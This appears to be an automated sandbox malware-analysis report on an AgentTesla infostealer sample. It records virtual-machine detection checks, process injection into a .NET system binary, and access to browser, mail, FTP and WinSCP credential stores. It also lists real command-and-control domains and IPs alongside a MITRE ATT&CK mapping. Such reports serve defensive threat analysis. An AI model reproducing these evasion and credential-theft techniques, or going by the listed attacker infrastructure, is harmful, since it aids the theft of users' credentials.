                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 6940Thread sleep time: -18446744073709540s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 6944Thread sleep count: 2557 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 6944Thread sleep count: 7299 > 30
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 2557
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 7299
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: Amcache.hve.10.drBinary or memory string: VMware
                      Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.10.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.10.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 0000000A.00000002.300722840.0000000004F20000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: WerFault.exe, 0000000A.00000002.300816441.0000000005020000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.10.drBinary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
                      Source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016BCB20 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 438000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43A000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: FD0008
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 protect: page execute and read and write
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeQueries volume information: C:\Users\user\Desktop\W7UbgU8x18.exe VolumeInformation
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W7UbgU8x18.exe.3938940.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W7UbgU8x18.exe.3938940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: W7UbgU8x18.exe PID: 5644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 408, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 408, type: MEMORYSTR

                      Remote Access Functionality:

                      Yara detected AgentTesla
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W7UbgU8x18.exe.3938940.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W7UbgU8x18.exe.3938940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: W7UbgU8x18.exe PID: 5644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 408, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation211 | Path Interception | Process Injection312 | Disable or Modify Tools1 | OS Credential Dumping2 | System Information Discovery114 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information1 | Input Capture1 | Query Registry1 | Remote Desktop Protocol | Data from Local System2 | Exfiltration Over Bluetooth | Encrypted Channel1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information1 | Credentials in Registry1 | Security Software Discovery121 | SMB/Windows Admin Shares | Email Collection1 | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing11 | NTDS | Process Discovery2 | Distributed Component Object Model | Input Capture1 | Scheduled Transfer | Non-Application Layer Protocol2 | SIM Card Swap | - | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Timestomp1 | LSA Secrets | Virtualization/Sandbox Evasion131 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol12 | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion131 | Cached Domain Credentials | Application Window Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection312 | DCSync | Remote System Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact

                      Behavior Graph


                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      W7UbgU8x18.exe | 36% | Virustotal | -
                      W7UbgU8x18.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                      W7UbgU8x18.exe | 100% | Joe Sandbox ML | -

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      2.0.aspnet_regbrowsers.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen8
                      2.0.aspnet_regbrowsers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                      2.0.aspnet_regbrowsers.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8
                      2.0.aspnet_regbrowsers.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen8
                      2.2.aspnet_regbrowsers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                      2.0.aspnet_regbrowsers.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

Source | Detection | Scanner | Label
odin.mk-host.com | 1% | Virustotal |

                      URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://194.85.248.219 | 0% | Avira URL Cloud | safe
http://odin.mk-host.com | 1% | Virustotal |
http://odin.mk-host.com | 0% | Avira URL Cloud | safe
http://194.85.248.219/token_ta992i.txt | 0% | Virustotal |
http://194.85.248.219/token_ta992i.txt | 0% | Avira URL Cloud | safe
http://crl.comodoca | 0% | Avira URL Cloud | safe
http://sGexjS.com | 0% | Avira URL Cloud | safe
http://194.85.248.219/publickey.txt | 0% | Avira URL Cloud | safe
http://m3kI8gc4jNB3oWFQtMC.org | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
odin.mk-host.com | 209.205.200.74 | true | true | | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://194.85.248.219/token_ta992i.txt | false | Virustotal 0%; Avira URL Cloud: safe | unknown
http://194.85.248.219/publickey.txt | false | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://127.0.0.1:HTTP/1.1 | aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://sectigo.com/CPS0 | aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp; aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp; aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://194.85.248.219 | W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://upx.sf.net | Amcache.hve.10.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://odin.mk-host.com | aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp | false | Virustotal 1%; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20 | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://crl.comodoca | aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://sGexjS.com | aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmp; WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmp | false | | high
http://m3kI8gc4jNB3oWFQtMC.org | aspnet_regbrowsers.exe, 00000002.00000002.519418805.000000000354A000.00000004.00000001.sdmp; aspnet_regbrowsers.exe, 00000002.00000003.465831512.00000000011A4000.00000004.00000001.sdmp; aspnet_regbrowsers.exe, 00000002.00000002.519494646.0000000003588000.00000004.00000001.sdmp; aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | W7UbgU8x18.exe, 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp; aspnet_regbrowsers.exe, 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp; aspnet_regbrowsers.exe, 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown

                                                    Contacted IPs


                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
209.205.200.74 | odin.mk-host.com | United States | 55081 | 24SHELLSUS | true
